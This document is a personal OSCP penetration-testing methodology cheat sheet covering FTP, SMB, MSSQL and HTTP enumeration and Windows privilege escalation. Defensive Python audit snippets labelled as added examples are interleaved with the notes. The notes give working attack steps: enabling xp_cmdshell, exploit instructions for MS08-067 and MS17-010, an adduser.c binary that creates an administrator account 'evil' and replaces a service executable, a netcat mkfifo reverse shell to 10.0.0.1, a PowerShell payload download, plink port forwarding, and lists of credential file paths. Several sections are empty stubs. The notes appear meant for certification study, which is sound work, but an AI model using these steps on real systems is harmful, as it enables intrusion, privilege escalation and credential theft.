My OSCP Methodology
FTP:
- service -> exploit (searchsploit + google)
- banner
- default creds (hydra)
- anonymous login
- put files
- if a web service exists, check whether the web root and the FTP root share the same path
 
- nmap info
- service -> exploit (searchsploit + google)
- banner
- default creds (hydra)
- default creds with nsr (hydra -e nsr: null password, same as username, reversed username)

SMB (139 & 445):
- nmap info:
  - OS (samba)
  - computer name / NetBIOS name
  - domain name
  - workgroup
  - OS of machine
- service (OS samba or nmap service header) -> exploit (searchsploit + google)
- enum4linux
- list shares with a null session: smbclient -L <ip> -N
- connect to a specific share with creds: smbclient \\ip\share -U username

MSSQL (1433):
- Connect to MSSQL:
- Enable xp_cmdshell and run a command through nmap:
    nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=<pass>,ms-sql-xp-cmdshell.cmd="net user" <ip>
  Output when the option gets enabled:
    Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. (return status = 0)
    Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. (return status = 0)

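Added example, not part of the original notes: the two "Configuration option ... changed" lines above are the same messages SQL Server writes to its ERRORLOG for every sp_configure change, which makes enabling xp_cmdshell easy to spot on the defensive side. The snippet parses constructed ERRORLOG lines and reports 0 -> 1 transitions of the options that grant host command execution; the timestamps, spid values and the set of watched options are my assumptions, not from the page.

```python
import re
from typing import Dict, List

# Constructed sample ERRORLOG lines (not captured from a real server).
# SQL Server writes one "Configuration option ... changed" line per
# sp_configure change, so enabling xp_cmdshell leaves exactly this trail.
SAMPLE_ERRORLOG = """\
2020-08-09 10:14:02.11 spid55      Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
2020-08-09 10:14:02.13 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-08-09 10:14:05.40 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2020-08-09 10:20:11.02 spid61      Configuration option 'clr enabled' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-08-09 10:20:12.77 spid7s      Recovery is complete. This is an informational message only. No user action is required.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?P<spid>spid\d+s?)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options that, once enabled, let a SQL login run code on the host (assumed watch list).
HIGH_RISK_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}


def parse_config_changes(log_text: str) -> List[Dict[str, str]]:
    """Return every sp_configure change recorded in the log, oldest first."""
    changes = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m:
            changes.append(m.groupdict())
    return changes


def find_enablements(log_text: str, watch=frozenset(HIGH_RISK_OPTIONS)) -> List[Dict[str, str]]:
    """Keep only 0 -> 1 transitions of a watched option.

    A '1 to 1' line (as in the sample output in the notes) means the option was
    already on, which belongs in a baseline review but is not a new enablement
    event; '1 to 0' is the option being switched off again.
    """
    return [
        c for c in parse_config_changes(log_text)
        if c["option"] in watch and c["old"] == "0" and c["new"] == "1"
    ]


if __name__ == "__main__":
    for hit in find_enablements(SAMPLE_ERRORLOG):
        print(f"{hit['ts']} {hit['spid']}: '{hit['option']}' enabled")
```

The session id (spid) in the hit is what ties the enablement back to the login that did it in the surrounding ERRORLOG context.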
HTTP:
- service -> exploit (searchsploit + google)
- nmap info
- if nmap output lists directories, send an OPTIONS request to check whether the PUT method is available
- nikto:
  - default
  - CGI all
- source
- gobuster:
  - with common.txt:
  - with big.txt:
  - with medium.txt:
- play around with burpsuite (Spider, Repeater)
- if a web page contains long articles with many words, use cewl:

Windows Server 2003 and IIS 6.0 privilege escalation using an impersonation token (Token Kidnapping revenge):
- use https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

MS08-067:
- needs listener
- git clone https://github.com/andyacer/ms08_067.git
- configuration:
  - pip install impacket
  - 2 reverse options for shellcoding:
    - use the third with 443
    - use the third with default
    - use second with default
    - use second with port of third or another port
- choose the right option of the menu:
  - find OS of machine
  - guess language
 
MS17-010:
- needs listener
- git clone https://github.com/worawit/MS17-010.git
- if needed, USERNAME = "//"
- next add the following 2 lines below def smb:
    smb_send_file(smbConn, '/root/htb/blue/puckieshell443.exe', 'C', '/puckieshell443.exe')
    service_exec(conn, r'cmd /c c:\puckieshell443.exe')
- custom payload:
  - needs listener
  - use https://github.com/nickvourd/eternalblue_win7_auto_gen in order to merge binaries and payload
  - run the following: python MS17-010/eternalblue_exploit7.py /tmp/sc_x.bin

MS10-059:
- needs listener
- use https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
- serve MS10-059.exe (https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe) to the victim
- run exploit:

- needs listener
- compile:

MS15-051:
- no listener needed (instant run)
- use https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
- check the architecture of the victim and choose the right exe
- upload to the victim machine
- run the following:

MS16-032:
- needs listener
- use https://www.exploit-db.com/exploits/39719
- edit the file:
  - at the end of the file add: Invoke-MS16-032
  - inside the file, search for cmd.exe (two occurrences)
  - replace them with shell.exe in the current directory on the victim
- generate shell.exe:
- serve shell.exe to the victim
- open a listener
- run the ps1 exploit:
 
Hot Potato:
- What is: Hot Potato (aka Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
- Affected systems: Windows 7, 8, 10, Server 2008, Server 2012
- Guide: https://foxglovesecurity.com/2016/01/16/hot-potato/
- Use: https://github.com/foxglovesec/Potato

Rotten Potato:
- What is: Rotten Potato and its standalone variants leverage a privilege escalation chain based on the BITS service having a MiTM listener on 127.0.0.1:6666, usable when you hold the SeImpersonate or SeAssignPrimaryToken privilege.
- Affected systems: Windows 7, 8, 10, Server 2008, Server 2012, Server 2016
- Guides: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ https://0xdf.gitlab.io/2018/08/04/htb-silo.html
- Use: https://github.com/nickvourd/lonelypotato
  - Rotten Potato by default opens a meterpreter session; use Lonely Potato, which opens an inline shell

Juicy Potato:
- What is: Juicy Potato is basically a weaponized version of the RottenPotato exploit that exploits the way Microsoft handles tokens. Through this, we achieve privilege escalation.
- Affected systems:
  - Windows 7 Enterprise
  - Windows 8.1 Enterprise
  - Windows 10 Enterprise
  - Windows 10 Professional
  - Windows Server 2008 R2 Enterprise
  - Windows Server 2012 Datacenter
  - Windows Server 2016 Standard
- Find CLSID here: https://ohpe.it/juicy-potato/CLSID/
- Guides: https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/#juicy-potato-abusing-the-golden-privileges https://hunter2.gitbook.io/darthsidious/privilege-escalation/juicy-potato#:~:text=Juicy%20potato%20is%20basically%20a,this%2C%20we%20achieve%20privilege%20escalation.
- Use: https://github.com/ohpe/juicy-potato

Windows local enumeration:
- systeminfo | findstr /B /C:"OS Name" /C:"OS Version" -> searchsploit
- systeminfo:
  - architecture
  - number of processors
  - domain
  - hotfixes
  - system locale
  - input locale
- number of processor cores:

Windows privileges (whoami /priv):
- more info here: https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf
- SeDebugPrivilege
- SeRestorePrivilege
- SeBackupPrivilege
- SeTakeOwnershipPrivilege
- SeTcbPrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeImpersonatePrivilege & SeAssignPrimaryTokenPrivilege

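As an added example that is not part of the notes above: a small audit of `whoami /priv` output against this list, written from the account-hardening side (which service accounts hold a privilege that leads to SYSTEM and should be moved to a less privileged identity). The sample output is constructed, and the one-line rationale attached to each privilege is my summary, not text from the page.

```python
from typing import Dict, List, Tuple

# Constructed sample of `whoami /priv` output for a service account
# (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeShutdownPrivilege           Shut down the system                      Disabled
"""

# The privileges from the list above; the short rationale per entry is added here.
HIGH_VALUE = {
    "SeDebugPrivilege": "read/write any process memory",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "forge arbitrary access tokens",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeImpersonatePrivilege": "impersonate clients (Potato family precondition)",
    "SeAssignPrimaryTokenPrivilege": "assign a token to a new process (Potato family precondition)",
}


def parse_whoami_priv(output: str) -> Dict[str, str]:
    """Map privilege name -> state, skipping the banner, header and separator rows."""
    privs = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def audit_privileges(output: str) -> List[Tuple[str, str, str]]:
    """Return (privilege, state, rationale) for every high-value privilege in the token.

    Disabled privileges are reported too: a privilege that is present in the token
    can be switched on by its holder (AdjustTokenPrivileges), so only removing it,
    or running the service under a less privileged account, closes the path.
    """
    found = parse_whoami_priv(output)
    return [(name, found[name], HIGH_VALUE[name]) for name in HIGH_VALUE if name in found]


if __name__ == "__main__":
    for name, state, why in audit_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} {why}")
```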
Users of the system and their groups:
- net user
- net user <username> (check "Password required" and the group memberships)
- whoami /groups

Insecure file permissions:
- or with powershell: Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
- if the user has full access to the service binary, the user can modify it
- custom exploit (adduser.c):
    #include <stdlib.h>

    int main(void)
    {
        int i;
        i = system("net user evil Ev!lpass /add");
        i = system("net localgroup administrators evil /add");
        return 0;
    }
- compile for Windows (mingw cross-compiler): i686-w64-mingw32-gcc adduser.c -o adduser.exe
- replace the service binary:
    move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
    move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
    dir "C:\Program Files\Serviio\bin"
- restart the service: net stop Serviio
- if access denied, try: wmic service where caption="Serviio" get name, caption, state, startmode -> if the start mode is Auto, the binary will execute automatically after a reboot
- whoami /priv -> if SeShutdownPrivilege is present we can restart the machine: shutdown /r /t 0
- verify: net localgroup Administrators

Unquoted service path:
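
The hardening check behind this step, as an added example that is not code from the original notes: it reads a constructed CSV export of service Name, PathName and StartMode (such as one built from Win32_Service), flags image paths that are unquoted and contain a space, and lists the intermediate paths CreateProcess would try before the real binary, which is where the fix applies (quote the path, or make sure no intermediate directory is writable by unprivileged users). The CSV layout, service names and paths are assumptions.

```python
import csv
import io
from typing import Dict, List

# Constructed CSV export of service configuration (Name, PathName, StartMode);
# not captured from a real host. The Serviio row shows a correctly quoted
# image path; CSV represents the embedded quotes by doubling them.
SAMPLE_SERVICES_CSV = r'''Name,PathName,StartMode
Serviio,"""C:\Program Files\Serviio\bin\ServiioService.exe""",Auto
VendorAgent,C:\Program Files\Vendor App\bin\agent.exe -service,Auto
Dhcp,C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted,Auto
ToolSvc,C:\Tools\toolsvc.exe,Manual
LegacySync,C:\Program Files (x86)\Legacy Sync\sync.exe,Disabled
'''


def is_quoted(path_name: str) -> bool:
    """A PathName that starts with a double quote is resolved unambiguously."""
    return path_name.strip().startswith('"')


def image_path(path_name: str) -> str:
    """Executable part of a PathName: the quoted token, or the text up to the first '.exe'."""
    s = path_name.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    idx = s.lower().find(".exe")
    return s[: idx + 4] if idx != -1 else s.split(" ", 1)[0]


def search_candidates(exe: str) -> List[str]:
    """Order in which CreateProcess resolves an unquoted path containing spaces:
    the string is cut at each space (with .exe appended) before the full path."""
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    candidates.append(exe)
    return candidates


def audit_services(csv_text: str) -> List[Dict[str, object]]:
    """Report every service whose image path is unquoted and contains a space."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["PathName"]
        if is_quoted(path):
            continue
        exe = image_path(path)
        if " " not in exe:
            continue
        findings.append({
            "name": row["Name"],
            "image": exe,
            "start_mode": row["StartMode"],
            # paths tried before the real binary; a writable parent directory
            # for any of them is what turns the misconfiguration into a finding
            "tries": search_candidates(exe)[:-1],
        })
    return findings


if __name__ == "__main__":
    for f in audit_services(SAMPLE_SERVICES_CSV):
        print(f"{f['name']} ({f['start_mode']}): {f['image']}")
        for t in f["tries"]:
            print("    resolved first:", t)
```

Disabled services are still reported, with their start mode, because the path is fixed by quoting it in the registry regardless of whether the service currently runs.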

Enumerating world-writable directories:

Installed applications and their versions:

Scheduled tasks:

Windows-Exploit-Suggester:
- python windows-exploit-suggester.py --database 2020-08-09-mssb.xls --systeminfo grandpa.txt

Sherlock:
- config: add "Find-AllVulns" as the last line
- download and run Sherlock:

Watson:
- find the latest .NET version on the victim:
- for older than Windows 10, download the zip version of Watson v1: https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437
- build the exe with Visual Studio

PowerUp:
- config: add "Invoke-AllChecks" as the last line
- download and run PowerUp:

Stored credentials:
- cmdkey /list -> if the interactive module is enabled, 100% runas as the other user
- if a domain and user exist, try again with runas as the other user

Stored as plaintext or base64:
- C:\unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\Windows\system32\sysprep\sysprep.xml

If the system is running an IIS web server, the web.config file:
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
- C:\inetpub\wwwroot\web.config

Local administrator passwords can also be retrieved via Group Policy Preferences:
- C:\ProgramData\Microsoft\Group Policy\History????\Machine\Preferences\Groups\Groups.xml
- \????\SYSVOL\Policies????\MACHINE\Preferences\Groups\Groups.xml

Besides Groups.xml, the cpassword attribute can be found in other policy preference files as well, such as:
- Services\Services.xml
- ScheduledTasks\ScheduledTasks.xml
- Printers\Printers.xml
- Drives\Drives.xml
- DataSources\DataSources.xml

Most Windows systems run McAfee as their endpoint protection. The password is stored encrypted in the SiteList.xml file:
- %AllUsersProfile%\Application Data\McAfee\Common Framework\SiteList.xml

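Added example for the unattend/sysprep and Group Policy Preferences locations above (not code from the notes): an audit that parses constructed unattend.xml and Groups.xml samples, flags password elements and cpassword attributes that still carry a value, and deliberately decodes nothing, since the purpose is to find files that need cleaning up. It also treats the `*SENSITIVE*DATA*DELETED*` marker that setup writes back after a cleanup pass as already cleared. File contents, account names and values are constructed placeholders.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed unattend.xml fragment (not from a real host). The base64 value
# is just the placeholder text encoded; the plaintext one is labelled as such.
SAMPLE_UNATTEND_XML = """\
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>UExBQ0VIT0xERVJfVkFMVUU=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>PLACEHOLDER_VALUE</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>*SENSITIVE*DATA*DELETED*</Value>
              <PlainText>false</PlainText>
            </Password>
            <Name>svc_constructed</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

# Constructed Groups.xml fragment; the cpassword value is a placeholder, not a real blob.
SAMPLE_GROUPS_XML = """\
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" image="2" changed="2020-08-09 10:00:00">
    <Properties action="U" newName="" fullName="" description="" cpassword="PLACEHOLDER_CPASSWORD" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
"""

PASSWORD_ELEMENTS = {"Password", "AdministratorPassword"}
CLEARED_MARKER = "*SENSITIVE*DATA*DELETED*"


def _local(tag: str) -> str:
    """Strip the XML namespace so unattend tags compare by local name."""
    return tag.rsplit("}", 1)[-1]


def audit_unattend(xml_text: str, source: str = "unattend.xml") -> List[Dict[str, str]]:
    """Flag every password element whose <Value> is still populated.

    <PlainText>false</PlainText> only means the value is base64-encoded, not
    encrypted, so both encodings are reported as findings.
    """
    findings = []
    for elem in ET.fromstring(xml_text.encode("utf-8")).iter():
        if _local(elem.tag) not in PASSWORD_ELEMENTS:
            continue
        value, plaintext = "", False
        for child in elem:
            if _local(child.tag) == "Value":
                value = (child.text or "").strip()
            elif _local(child.tag) == "PlainText":
                plaintext = (child.text or "").strip().lower() == "true"
        if not value or value == CLEARED_MARKER:
            continue
        findings.append({"source": source, "element": _local(elem.tag),
                         "encoding": "plaintext" if plaintext else "base64"})
    return findings


def audit_gpp(xml_text: str, source: str = "Groups.xml") -> List[Dict[str, str]]:
    """Flag every element carrying a non-empty cpassword attribute (any GPP file type)."""
    findings = []
    for elem in ET.fromstring(xml_text.encode("utf-8")).iter():
        if elem.get("cpassword"):  # empty cpassword="" means no password is set
            findings.append({"source": source, "element": _local(elem.tag),
                             "user": elem.get("userName", ""),
                             "encoding": "cpassword (AES with published key, MS14-025)"})
    return findings


if __name__ == "__main__":
    for f in audit_unattend(SAMPLE_UNATTEND_XML) + audit_gpp(SAMPLE_GROUPS_XML):
        print(f)
```

`audit_gpp` works unchanged on the other preference files listed above (Services.xml, ScheduledTasks.xml, Drives.xml, ...), because it keys on the attribute rather than on the element layout.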
- download a file with powershell: powershell -command "& { iwr http://192.168.199.1/win.txt -OutFile win.txt }"
- netcat reverse shell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

plink:
→ What is plink:
Plink is a command-line connection tool similar to UNIX ssh. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink is a command-line application: it makes a simple interactive connection to a remote server. This means that you cannot just double-click on its icon to run it; instead you have to bring up a console window.
→ Example to expose ports: 445 (samba)
→ How to expose a port on your local machine:
[local_machine]: systemctl start ssh
→ Upload plink.exe to the remote machine as binary (mode)
[remote_machine]: plink.exe -l [username] -pw [password] -R [port]:127.0.0.1:[port] [ip]
→ After that, the victim's port will be exposed on your local machine (127.0.0.1)